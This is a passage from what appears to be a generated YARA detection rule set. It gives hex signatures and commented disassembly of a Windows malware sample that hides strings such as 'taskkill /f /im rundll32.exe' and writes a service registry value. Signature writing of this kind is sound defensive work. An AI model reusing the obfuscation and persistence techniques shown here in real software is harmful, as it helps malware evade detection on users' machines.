65 88 44 24 ?? 88 54 24 ?? 88 5C 24 ?? 88 44 24 ?? C6 44 24 ?? 00 FF D6 8B 84 24 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 8D 4C 24 ?? 50 8D 94 24 ?? ?? ?? ?? 51 52 FF D5 83 C4 0C 6A 00 FF D6 6A 00 FF D6 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? B9 40 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 F3 AB 66 AB AA B0 64 B2 2E B1 32 6A 00 88 5C 24 ?? C6 44 24 ?? 34 88 44 24 ?? C6 44 24 ?? 2D 88 5C 24 ?? 88 54 24 ?? 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 2D 88 5C 24 ?? 88 54 24 ?? 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 20 88 5C 24 ?? 88 54 24 ?? 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 3A 88 5C 24 ?? 88 54 24 ?? 88 4C 24 ?? 88 44 24 ?? C6 44 24 ?? 00 FF D6 8B 4C 24 ?? 8B 54 24 ?? 8B 44 24 ?? 81 E1 FF FF 00 00 81 E2 FF FF 00 00 51 8B 4C 24 ?? 52 8B 54 24 ?? 25 FF FF 00 00 81 E1 FF FF 00 00 50 81 E2 FF FF 00 00 51 8D 44 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 50 51 FF D5 83 C4 1C 6A 00 FF D6 8D 54 24 ?? 6A 00 52 C6 44 24 ?? 4D C6 44 24 ?? 61 C6 44 24 ?? 72 C6 44 24 ?? 6B C6 44 24 ?? 54 C6 44 24 ?? 69 C6 44 24 ?? 6D C6 44 24 ?? 65 C6 44 24 ?? 00 FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 8D 4C 24 ?? 6A 01 8D 94 24 ?? ?? ?? ?? 51 52 68 02 00 00 80 E8 ?? ?? ?? ?? 
83 C4 1C 5F 5E 5D 5B 81 C4 60 05 00 00 C3 } + /* +Basic Block at 0x00406c90@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00406c90 + .text:0x00406c90 FUNC: int cdecl sub_00406c90( int arg0, int arg1, ) [4 XREFS] + .text:0x00406c90 + .text:0x00406c90 Stack Variables: (offset from initial top of stack) + .text:0x00406c90 8: int arg1 + .text:0x00406c90 4: int arg0 + .text:0x00406c90 -256: int local256 + .text:0x00406c90 -259: int local259 + .text:0x00406c90 -260: int local260 + .text:0x00406c90 -261: int local261 + .text:0x00406c90 -262: int local262 + .text:0x00406c90 -263: int local263 + .text:0x00406c90 -264: int local264 + .text:0x00406c90 -265: int local265 + .text:0x00406c90 -266: int local266 + .text:0x00406c90 -267: int local267 + .text:0x00406c90 -268: int local268 + .text:0x00406c90 + .text:0x00406c90 81ec0c010000 sub esp,268 + .text:0x00406c96 56 push esi + .text:0x00406c97 8b3578904000 mov esi,dword [0x00409078] + .text:0x00406c9d 6a00 push 0 + .text:0x00406c9f c64424084d mov byte [esp + 8],77 + .text:0x00406ca4 c64424096f mov byte [esp + 9],111 + .text:0x00406ca9 c644240a74 mov byte [esp + 10],116 + .text:0x00406cae c644240b68 mov byte [esp + 11],104 + .text:0x00406cb3 c644240c65 mov byte [esp + 12],101 + .text:0x00406cb8 c644240d72 mov byte [esp + 13],114 + .text:0x00406cbd c644240e33 mov byte [esp + 14],51 + .text:0x00406cc2 c644240f36 mov byte [esp + 15],54 + .text:0x00406cc7 c644241030 mov byte [esp + 16],48 + .text:0x00406ccc c644241100 mov byte [esp + 17],0 + .text:0x00406cd1 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406cd3 8d442404 lea eax,dword [esp + 4] + .text:0x00406cd7 6a0a push 10 + .text:0x00406cd9 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00406cdd 50 push eax + .text:0x00406cde 51 push ecx + .text:0x00406cdf 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00406ce5 e866dcffff call 0x00404950 ;sub_00404950(local256,local268,10) + .text:0x00406cea 6a00 push 0 + .text:0x00406cec ffd6 call 
esi ;kernel32.Sleep(0) + .text:0x00406cee 8b942418010000 mov edx,dword [esp + 280] + .text:0x00406cf5 8b842414010000 mov eax,dword [esp + 276] + .text:0x00406cfc 81e2ffff0000 and edx,0x0000ffff + .text:0x00406d02 8d4c2410 lea ecx,dword [esp + 16] + .text:0x00406d06 52 push edx + .text:0x00406d07 50 push eax + .text:0x00406d08 51 push ecx + .text:0x00406d09 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00406d0f e8dcdcffff call 0x004049f0 ;sub_004049f0(local256,arg0,0x0000300f) + .text:0x00406d14 6a00 push 0 + .text:0x00406d16 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406d18 5e pop esi + .text:0x00406d19 81c40c010000 add esp,268 + .text:0x00406d1f c3 ret + */ + $c9 = { 81 EC 0C 01 00 00 56 8B 35 ?? ?? ?? ?? 6A 00 C6 44 24 ?? 4D C6 44 24 ?? 6F C6 44 24 ?? 74 C6 44 24 ?? 68 C6 44 24 ?? 65 C6 44 24 ?? 72 C6 44 24 ?? 33 C6 44 24 ?? 36 C6 44 24 ?? 30 C6 44 24 ?? 00 FF D6 8D 44 24 ?? 6A 0A 8D 4C 24 ?? 50 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D6 8B 94 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 81 E2 FF FF 00 00 8D 4C 24 ?? 52 50 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 
6A 00 FF D6 5E 81 C4 0C 01 00 00 C3 } + /* +Basic Block at 0x00406db0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00406db0 + .text:0x00406db0 FUNC: int cdecl sub_00406db0( ) [2 XREFS] + .text:0x00406db0 + .text:0x00406db0 Stack Variables: (offset from initial top of stack) + .text:0x00406db0 -8: int local8 + .text:0x00406db0 -9: int local9 + .text:0x00406db0 -10: int local10 + .text:0x00406db0 -11: int local11 + .text:0x00406db0 -12: int local12 + .text:0x00406db0 -13: int local13 + .text:0x00406db0 -14: int local14 + .text:0x00406db0 -15: int local15 + .text:0x00406db0 -16: int local16 + .text:0x00406db0 -17: int local17 + .text:0x00406db0 -18: int local18 + .text:0x00406db0 -19: int local19 + .text:0x00406db0 -20: int local20 + .text:0x00406db0 -24: int local24 + .text:0x00406db0 -25: int local25 + .text:0x00406db0 -26: int local26 + .text:0x00406db0 -27: int local27 + .text:0x00406db0 -28: int local28 + .text:0x00406db0 -29: int local29 + .text:0x00406db0 -30: int local30 + .text:0x00406db0 -31: int local31 + .text:0x00406db0 -32: int local32 + .text:0x00406db0 -33: int local33 + .text:0x00406db0 -34: int local34 + .text:0x00406db0 -35: int local35 + .text:0x00406db0 -36: int local36 + .text:0x00406db0 -37: int local37 + .text:0x00406db0 -38: int local38 + .text:0x00406db0 -39: int local39 + .text:0x00406db0 -40: int local40 + .text:0x00406db0 -41: int local41 + .text:0x00406db0 -42: int local42 + .text:0x00406db0 -43: int local43 + .text:0x00406db0 -44: int local44 + .text:0x00406db0 -45: int local45 + .text:0x00406db0 -46: int local46 + .text:0x00406db0 -47: int local47 + .text:0x00406db0 -48: int local48 + .text:0x00406db0 -49: int local49 + .text:0x00406db0 -50: int local50 + .text:0x00406db0 -51: int local51 + .text:0x00406db0 -52: int local52 + .text:0x00406db0 + .text:0x00406db0 55 push ebp + .text:0x00406db1 8bec mov ebp,esp + .text:0x00406db3 83ec30 sub esp,48 + .text:0x00406db6 53 push ebx + 
.text:0x00406db7 56 push esi + .text:0x00406db8 90 nop + .text:0x00406db9 8b3578904000 mov esi,dword [0x00409078] + .text:0x00406dbf 6a00 push 0 + .text:0x00406dc1 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406dc3 b36c mov bl,108 + .text:0x00406dc5 6a00 push 0 + .text:0x00406dc7 c645f072 mov byte [ebp - 16],114 + .text:0x00406dcb c645f175 mov byte [ebp - 15],117 + .text:0x00406dcf c645f26e mov byte [ebp - 14],110 + .text:0x00406dd3 c645f364 mov byte [ebp - 13],100 + .text:0x00406dd7 885df4 mov byte [ebp - 12],bl + .text:0x00406dda 885df5 mov byte [ebp - 11],bl + .text:0x00406ddd c645f633 mov byte [ebp - 10],51 + .text:0x00406de1 c645f732 mov byte [ebp - 9],50 + .text:0x00406de5 c645f82e mov byte [ebp - 8],46 + .text:0x00406de9 c645f965 mov byte [ebp - 7],101 + .text:0x00406ded c645fa78 mov byte [ebp - 6],120 + .text:0x00406df1 c645fb65 mov byte [ebp - 5],101 + .text:0x00406df5 c645fc00 mov byte [ebp - 4],0 + .text:0x00406df9 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406dfb 6a00 push 0 + .text:0x00406dfd ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406dff 90 nop + .text:0x00406e00 8d45f0 lea eax,dword [ebp - 16] + .text:0x00406e03 50 push eax + .text:0x00406e04 e8670b0000 call 0x00407970 ;sub_00407970(local20) + .text:0x00406e09 83c404 add esp,4 + .text:0x00406e0c 85c0 test eax,eax + .text:0x00406e0e 0f8496000000 jz 0x00406eaa + */ + $c10 = { 55 8B EC 83 EC 30 53 56 90 8B 35 ?? ?? ?? ?? 6A 00 FF D6 B3 6C 6A 00 C6 45 ?? 72 C6 45 ?? 75 C6 45 ?? 6E C6 45 ?? 64 88 5D ?? 88 5D ?? C6 45 ?? 33 C6 45 ?? 32 C6 45 ?? 2E C6 45 ?? 65 C6 45 ?? 78 C6 45 ?? 65 C6 45 ?? 00 FF D6 6A 00 FF D6 90 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 04 85 C0 0F 84 ?? ?? ?? ?? 
} + /* +Basic Block at 0x00406e14@9324d1a8ae37a36ae560c37448c9705a with 2 features: + - contain obfuscated stackstrings + - create process on Windows + .text:0x00406e14 6a00 push 0 + .text:0x00406e16 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406e18 6a00 push 0 + .text:0x00406e1a ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406e1c 90 nop + .text:0x00406e1d b06b mov al,107 + .text:0x00406e1f b269 mov dl,105 + .text:0x00406e21 8845d3 mov byte [ebp - 45],al + .text:0x00406e24 8845d4 mov byte [ebp - 44],al + .text:0x00406e27 b020 mov al,32 + .text:0x00406e29 b12f mov cl,47 + .text:0x00406e2b 6a00 push 0 + .text:0x00406e2d c645d074 mov byte [ebp - 48],116 + .text:0x00406e31 c645d161 mov byte [ebp - 47],97 + .text:0x00406e35 c645d273 mov byte [ebp - 46],115 + .text:0x00406e39 8855d5 mov byte [ebp - 43],dl + .text:0x00406e3c 885dd6 mov byte [ebp - 42],bl + .text:0x00406e3f 885dd7 mov byte [ebp - 41],bl + .text:0x00406e42 8845d8 mov byte [ebp - 40],al + .text:0x00406e45 884dd9 mov byte [ebp - 39],cl + .text:0x00406e48 c645da66 mov byte [ebp - 38],102 + .text:0x00406e4c 8845db mov byte [ebp - 37],al + .text:0x00406e4f 884ddc mov byte [ebp - 36],cl + .text:0x00406e52 8855dd mov byte [ebp - 35],dl + .text:0x00406e55 c645de6d mov byte [ebp - 34],109 + .text:0x00406e59 8845df mov byte [ebp - 33],al + .text:0x00406e5c c645e072 mov byte [ebp - 32],114 + .text:0x00406e60 c645e175 mov byte [ebp - 31],117 + .text:0x00406e64 c645e26e mov byte [ebp - 30],110 + .text:0x00406e68 c645e364 mov byte [ebp - 29],100 + .text:0x00406e6c 885de4 mov byte [ebp - 28],bl + .text:0x00406e6f 885de5 mov byte [ebp - 27],bl + .text:0x00406e72 c645e633 mov byte [ebp - 26],51 + .text:0x00406e76 c645e732 mov byte [ebp - 25],50 + .text:0x00406e7a c645e82e mov byte [ebp - 24],46 + .text:0x00406e7e c645e965 mov byte [ebp - 23],101 + .text:0x00406e82 c645ea78 mov byte [ebp - 22],120 + .text:0x00406e86 c645eb65 mov byte [ebp - 21],101 + .text:0x00406e8a c645ec00 mov byte [ebp - 20],0 + .text:0x00406e8e ffd6 
call esi ;kernel32.Sleep(0) + .text:0x00406e90 6a00 push 0 + .text:0x00406e92 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406e94 90 nop + .text:0x00406e95 6a00 push 0 + .text:0x00406e97 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00406e99 90 nop + .text:0x00406e9a 8d4dd0 lea ecx,dword [ebp - 48] + .text:0x00406e9d 6a00 push 0 + .text:0x00406e9f 51 push ecx + .text:0x00406ea0 ff1530914000 call dword [0x00409130] ;kernel32.WinExec(local52,0) + .text:0x00406ea6 6a00 push 0 + .text:0x00406ea8 ffd6 call esi ;kernel32.Sleep(0) + */ + $c11 = { 6A 00 FF D6 6A 00 FF D6 90 B0 6B B2 69 88 45 ?? 88 45 ?? B0 20 B1 2F 6A 00 C6 45 ?? 74 C6 45 ?? 61 C6 45 ?? 73 88 55 ?? 88 5D ?? 88 5D ?? 88 45 ?? 88 4D ?? C6 45 ?? 66 88 45 ?? 88 4D ?? 88 55 ?? C6 45 ?? 6D 88 45 ?? C6 45 ?? 72 C6 45 ?? 75 C6 45 ?? 6E C6 45 ?? 64 88 5D ?? 88 5D ?? C6 45 ?? 33 C6 45 ?? 32 C6 45 ?? 2E C6 45 ?? 65 C6 45 ?? 78 C6 45 ?? 65 C6 45 ?? 00 FF D6 6A 00 FF D6 90 6A 00 FF D6 90 8D 4D ?? 6A 00 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 } + /* +Basic Block at 0x0040730f@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x0040730f loc_0040730f: [1 XREFS] + .text:0x0040730f 53 push ebx + .text:0x00407310 c645f425 mov byte [ebp - 12],37 + .text:0x00407314 c645f573 mov byte [ebp - 11],115 + .text:0x00407318 c645f600 mov byte [ebp - 10],0 + .text:0x0040731c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040731e 8d55f4 lea edx,dword [ebp - 12] + .text:0x00407321 6818a24000 push 0x0040a218 + .text:0x00407326 52 push edx + .text:0x00407327 6818a24000 push 0x0040a218 + .text:0x0040732c e88f0b0000 call 0x00407ec0 ;msvcrt.sprintf(0x0040a218,local16) + .text:0x00407331 83c40c add esp,12 + .text:0x00407334 53 push ebx + .text:0x00407335 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407337 53 push ebx + .text:0x00407338 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040733a 53 push ebx + .text:0x0040733b c645e443 mov byte [ebp - 28],67 + .text:0x0040733f c645e56f mov byte [ebp - 27],111 + 
.text:0x00407343 c645e66e mov byte [ebp - 26],110 + .text:0x00407347 c645e76e mov byte [ebp - 25],110 + .text:0x0040734b c645e865 mov byte [ebp - 24],101 + .text:0x0040734f c645e963 mov byte [ebp - 23],99 + .text:0x00407353 c645ea74 mov byte [ebp - 22],116 + .text:0x00407357 c645eb47 mov byte [ebp - 21],71 + .text:0x0040735b c645ec72 mov byte [ebp - 20],114 + .text:0x0040735f c645ed6f mov byte [ebp - 19],111 + .text:0x00407363 c645ee75 mov byte [ebp - 18],117 + .text:0x00407367 c645ef70 mov byte [ebp - 17],112 + .text:0x0040736b c645f000 mov byte [ebp - 16],0 + .text:0x0040736f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407371 53 push ebx + .text:0x00407372 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407374 53 push ebx + .text:0x00407375 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407377 53 push ebx + .text:0x00407378 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040737a 8d85acf8ffff lea eax,dword [ebp - 1876] + .text:0x00407380 6800040000 push 1024 + .text:0x00407385 8d4de4 lea ecx,dword [ebp - 28] + .text:0x00407388 50 push eax + .text:0x00407389 51 push ecx + .text:0x0040738a 6818a24000 push 0x0040a218 + .text:0x0040738f e8ccdbffff call 0x00404f60 ;sub_00404f60(0x0040a218,local32,local1880,1024) + .text:0x00407394 83c410 add esp,16 + .text:0x00407397 53 push ebx + .text:0x00407398 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040739a 53 push ebx + .text:0x0040739b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040739d 53 push ebx + .text:0x0040739e ffd6 call esi ;kernel32.Sleep(0) + .text:0x004073a0 8d95acf8ffff lea edx,dword [ebp - 1876] + .text:0x004073a6 52 push edx + .text:0x004073a7 ff15c4904000 call dword [0x004090c4] ;kernel32.lstrlenA(local1880) + .text:0x004073ad 85c0 test eax,eax + .text:0x004073af 751f jnz 0x004073d0 + */ + $c12 = { 53 C6 45 ?? 25 C6 45 ?? 73 C6 45 ?? 00 FF D6 8D 55 ?? 68 18 A2 40 00 52 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 0C 53 FF D6 53 FF D6 53 C6 45 ?? 43 C6 45 ?? 6F C6 45 ?? 6E C6 45 ?? 6E C6 45 ?? 65 C6 45 ?? 63 C6 45 ?? 74 C6 45 ?? 
47 C6 45 ?? 72 C6 45 ?? 6F C6 45 ?? 75 C6 45 ?? 70 C6 45 ?? 00 FF D6 53 FF D6 53 FF D6 53 FF D6 8D 85 ?? ?? ?? ?? 68 00 04 00 00 8D 4D ?? 50 51 68 18 A2 40 00 E8 ?? ?? ?? ?? 83 C4 10 53 FF D6 53 FF D6 53 FF D6 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? } + /* +Basic Block at 0x0040764a@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x0040764a 6a00 push 0 + .text:0x0040764c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040764e b053 mov al,83 + .text:0x00407650 8885a4fcffff mov byte [ebp - 860],al + .text:0x00407656 c685a5fcffff59 mov byte [ebp - 859],89 + .text:0x0040765d 8885a6fcffff mov byte [ebp - 858],al + .text:0x00407663 c685a7fcffff54 mov byte [ebp - 857],84 + .text:0x0040766a c685a8fcffff45 mov byte [ebp - 856],69 + .text:0x00407671 c685a9fcffff4d mov byte [ebp - 855],77 + .text:0x00407678 b15c mov cl,92 + .text:0x0040767a 888daafcffff mov byte [ebp - 854],cl + .text:0x00407680 b243 mov dl,67 + .text:0x00407682 8895abfcffff mov byte [ebp - 853],dl + .text:0x00407688 c685acfcffff75 mov byte [ebp - 852],117 + .text:0x0040768f c685adfcffff72 mov byte [ebp - 851],114 + .text:0x00407696 c685aefcffff72 mov byte [ebp - 850],114 + .text:0x0040769d b365 mov bl,101 + .text:0x0040769f 889daffcffff mov byte [ebp - 849],bl + .text:0x004076a5 c685b0fcffff6e mov byte [ebp - 848],110 + .text:0x004076ac c685b1fcffff74 mov byte [ebp - 847],116 + .text:0x004076b3 8895b2fcffff mov byte [ebp - 846],dl + .text:0x004076b9 c685b3fcffff6f mov byte [ebp - 845],111 + .text:0x004076c0 c685b4fcffff6e mov byte [ebp - 844],110 + .text:0x004076c7 c685b5fcffff74 mov byte [ebp - 843],116 + .text:0x004076ce c685b6fcffff72 mov byte [ebp - 842],114 + .text:0x004076d5 c685b7fcffff6f mov byte [ebp - 841],111 + .text:0x004076dc c685b8fcffff6c mov byte [ebp - 840],108 + .text:0x004076e3 8885b9fcffff mov byte [ebp - 839],al + .text:0x004076e9 889dbafcffff mov byte [ebp - 838],bl + .text:0x004076ef c685bbfcffff74 mov byte [ebp - 837],116 + 
.text:0x004076f6 888dbcfcffff mov byte [ebp - 836],cl + .text:0x004076fc 8885bdfcffff mov byte [ebp - 835],al + .text:0x00407702 889dbefcffff mov byte [ebp - 834],bl + .text:0x00407708 c685bffcffff72 mov byte [ebp - 833],114 + .text:0x0040770f c685c0fcffff76 mov byte [ebp - 832],118 + .text:0x00407716 c685c1fcffff69 mov byte [ebp - 831],105 + .text:0x0040771d c685c2fcffff63 mov byte [ebp - 830],99 + .text:0x00407724 889dc3fcffff mov byte [ebp - 829],bl + .text:0x0040772a c685c4fcffff73 mov byte [ebp - 828],115 + .text:0x00407731 888dc5fcffff mov byte [ebp - 827],cl + .text:0x00407737 c685c6fcffff00 mov byte [ebp - 826],0 + .text:0x0040773e 6a00 push 0 + .text:0x00407740 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407742 8d8da4fcffff lea ecx,dword [ebp - 860] + .text:0x00407748 51 push ecx + .text:0x00407749 8d95e4feffff lea edx,dword [ebp - 284] + .text:0x0040774f 52 push edx + .text:0x00407750 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407756 e815d0ffff call 0x00404770 ;sub_00404770(local288,local864) + .text:0x0040775b 6a00 push 0 + .text:0x0040775d ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040775f 8b450c mov eax,dword [ebp + 12] + .text:0x00407762 50 push eax + .text:0x00407763 8d8de4feffff lea ecx,dword [ebp - 284] + .text:0x00407769 51 push ecx + .text:0x0040776a 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00407770 e83bcfffff call 0x004046b0 ;sub_004046b0(local288,arg1) + .text:0x00407775 6a00 push 0 + .text:0x00407777 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407779 8d95dcfdffff lea edx,dword [ebp - 548] + .text:0x0040777f 52 push edx + .text:0x00407780 8d85e4feffff lea eax,dword [ebp - 284] + .text:0x00407786 50 push eax + .text:0x00407787 6802000080 push 0x80000002 + .text:0x0040778c ff1520904000 call dword [0x00409020] ;advapi32.RegOpenKeyA(0x80000002,local288,local552) + .text:0x00407792 6a00 push 0 + .text:0x00407794 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00407796 c68594fcffff44 mov byte [ebp - 876],68 + .text:0x0040779d 
889d95fcffff mov byte [ebp - 875],bl + .text:0x004077a3 c68596fcffff73 mov byte [ebp - 874],115 + .text:0x004077aa c68597fcffff63 mov byte [ebp - 873],99 + .text:0x004077b1 c68598fcffff72 mov byte [ebp - 872],114 + .text:0x004077b8 c68599fcffff69 mov byte [ebp - 871],105 + .text:0x004077bf c6859afcffff70 mov byte [ebp - 870],112 + .text:0x004077c6 c6859bfcffff74 mov byte [ebp - 869],116 + .text:0x004077cd c6859cfcffff69 mov byte [ebp - 868],105 + .text:0x004077d4 c6859dfcffff6f mov byte [ebp - 867],111 + .text:0x004077db c6859efcffff6e mov byte [ebp - 866],110 + .text:0x004077e2 c6859ffcffff00 mov byte [ebp - 865],0 + .text:0x004077e9 6a00 push 0 + .text:0x004077eb ffd6 call esi ;kernel32.Sleep(0) + .text:0x004077ed 8b5d14 mov ebx,dword [ebp + 20] + .text:0x004077f0 53 push ebx + .text:0x004077f1 ff15c4904000 call dword [0x004090c4] ;kernel32.lstrlenA(arg3) + .text:0x004077f7 50 push eax + .text:0x004077f8 53 push ebx + .text:0x004077f9 6a01 push 1 + .text:0x004077fb 6a00 push 0 + .text:0x004077fd 8d8d94fcffff lea ecx,dword [ebp - 876] + .text:0x00407803 51 push ecx + .text:0x00407804 8b95dcfdffff mov edx,dword [ebp - 548] + .text:0x0040780a 52 push edx + .text:0x0040780b ff1500904000 call dword [0x00409000] ;advapi32.RegSetValueExA(0,local880,0,1,arg3,kernel32.lstrlenA(arg3)) + .text:0x00407811 8b9dd4fcffff mov ebx,dword [ebp - 812] + */ + $c13 = { 6A 00 FF D6 B0 53 88 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 59 88 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 54 C6 85 ?? ?? ?? ?? 45 C6 85 ?? ?? ?? ?? 4D B1 5C 88 8D ?? ?? ?? ?? B2 43 88 95 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 75 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 72 B3 65 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 74 88 95 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 6F C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 6F C6 85 ?? ?? ?? ?? 6C 88 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 74 88 8D ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 76 C6 85 ?? ?? ?? 
?? 69 C6 85 ?? ?? ?? ?? 63 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 73 88 8D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 00 6A 00 FF D6 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D6 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 68 02 00 00 80 FF 15 ?? ?? ?? ?? 6A 00 FF D6 C6 85 ?? ?? ?? ?? 44 88 9D ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 73 C6 85 ?? ?? ?? ?? 63 C6 85 ?? ?? ?? ?? 72 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 74 C6 85 ?? ?? ?? ?? 69 C6 85 ?? ?? ?? ?? 6F C6 85 ?? ?? ?? ?? 6E C6 85 ?? ?? ?? ?? 00 6A 00 FF D6 8B 5D ?? 53 FF 15 ?? ?? ?? ?? 50 53 6A 01 6A 00 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? } + /* +Basic Block at 0x00401867@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - create TCP socket + .text:0x00401867 loc_00401867: [3 XREFS] + .text:0x00401867 6a06 push 6 + .text:0x00401869 6a01 push 1 + .text:0x0040186b 6a02 push 2 + .text:0x0040186d ff1500924000 call dword [0x00409200] ;ws2_32.socket(2,1,6) + .text:0x00401873 83f8ff cmp eax,0xffffffff + .text:0x00401876 8986a8000000 mov dword [esi + 168],eax + .text:0x0040187c 750b jnz 0x00401889 + */ + $c14 = { 6A 06 6A 01 6A 02 FF 15 ?? ?? ?? ?? 83 F8 FF 89 86 ?? ?? ?? ?? 75 ?? } + /* +Basic Block at 0x00402a71@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - get file attributes + .text:0x00402a71 8b4c246c mov ecx,dword [esp + 108] + .text:0x00402a75 51 push ecx + .text:0x00402a76 e8d5feffff call 0x00402950 ;sub_00402950(0,0,arg1,arg1) + .text:0x00402a7b 83c404 add esp,4 + .text:0x00402a7e 55 push ebp + .text:0x00402a7f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00402a81 68b8a84000 push 0x0040a8b8 + .text:0x00402a86 ff15bc904000 call dword [0x004090bc] ;kernel32.GetFileAttributesA(0x0040a8b8) + .text:0x00402a8c 83f8ff cmp eax,0xffffffff + .text:0x00402a8f 7475 jz 0x00402b06 + */ + $c15 = { 8B 4C 24 ?? 51 E8 ?? ?? ?? ?? 
83 C4 04 55 FF D6 68 B8 A8 40 00 FF 15 ?? ?? ?? ?? 83 F8 FF 74 ?? } + /* +Basic Block at 0x00403b43@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - get file attributes + .text:0x00403b43 6a00 push 0 + .text:0x00403b45 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403b47 8d4c2454 lea ecx,dword [esp + 84] + .text:0x00403b4b c64424086f mov byte [esp + 8],111 + .text:0x00403b50 51 push ecx + .text:0x00403b51 c644240d70 mov byte [esp + 13],112 + .text:0x00403b56 c644240e65 mov byte [esp + 14],101 + .text:0x00403b5b c644240f6e mov byte [esp + 15],110 + .text:0x00403b60 c644241000 mov byte [esp + 16],0 + .text:0x00403b65 ff15bc904000 call dword [0x004090bc] ;kernel32.GetFileAttributesA(local260) + .text:0x00403b6b 83f8ff cmp eax,0xffffffff + .text:0x00403b6e 7420 jz 0x00403b90 + */ + $c16 = { 6A 00 FF D6 8D 4C 24 ?? C6 44 24 ?? 6F 51 C6 44 24 ?? 70 C6 44 24 ?? 65 C6 44 24 ?? 6E C6 44 24 ?? 00 FF 15 ?? ?? ?? ?? 83 F8 FF 74 ?? } + /* +Basic Block at 0x00403b70@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - create process on Windows + .text:0x00403b70 6a00 push 0 + .text:0x00403b72 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403b74 6a05 push 5 + .text:0x00403b76 6a00 push 0 + .text:0x00403b78 8d54245c lea edx,dword [esp + 92] + .text:0x00403b7c 6a00 push 0 + .text:0x00403b7e 8d442414 lea eax,dword [esp + 20] + .text:0x00403b82 52 push edx + .text:0x00403b83 50 push eax + .text:0x00403b84 6a00 push 0 + .text:0x00403b86 ff15ac914000 call dword [0x004091ac] ;shell32.ShellExecuteA(0,local336,local260,0,0,5) + .text:0x00403b8c 6a00 push 0 + .text:0x00403b8e ffd6 call esi ;kernel32.Sleep(0) + */ + $c17 = { 6A 00 FF D6 6A 05 6A 00 8D 54 24 ?? 6A 00 8D 44 24 ?? 52 50 6A 00 FF 15 ?? ?? ?? ?? 
